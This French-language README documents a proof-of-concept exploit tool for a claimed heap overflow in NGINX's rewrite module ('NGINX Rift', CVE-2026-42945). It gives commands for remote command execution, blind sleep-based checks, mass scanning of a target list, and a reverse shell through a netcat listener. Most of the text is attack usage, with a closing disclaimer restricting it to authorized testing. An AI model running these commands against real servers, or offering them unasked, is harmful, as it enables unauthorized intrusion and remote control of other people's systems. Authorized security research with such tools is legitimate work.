
Exploit de preuve de concept pour CVE-2026-42945 (NGINX Rift) avec RCE multimode, vérification aveugle, shell inverse et capacités d'analyse par lots pour la recherche en sécurité autorisée.
Un outil de preuve de concept (PoC) professionnel pour rechercher et identifier la vulnérabilité NGINX Rift, un dépassement de tampon dans le tas critique dans le module ngx_http_rewrite_module.
python3 poc.py --url http://target.com --method id
Créez un fichier nommé targets.txt avec une URL par ligne :
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
Puis exécutez :
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
Démarrez d'abord votre écouteur : nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [VOTRE_IP] --listen-port 1337
Cet outil est destiné à des fins éducatives et à des audits de sécurité autorisés uniquement. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script. Obtenez toujours une permission explicite avant de tester une infrastructure.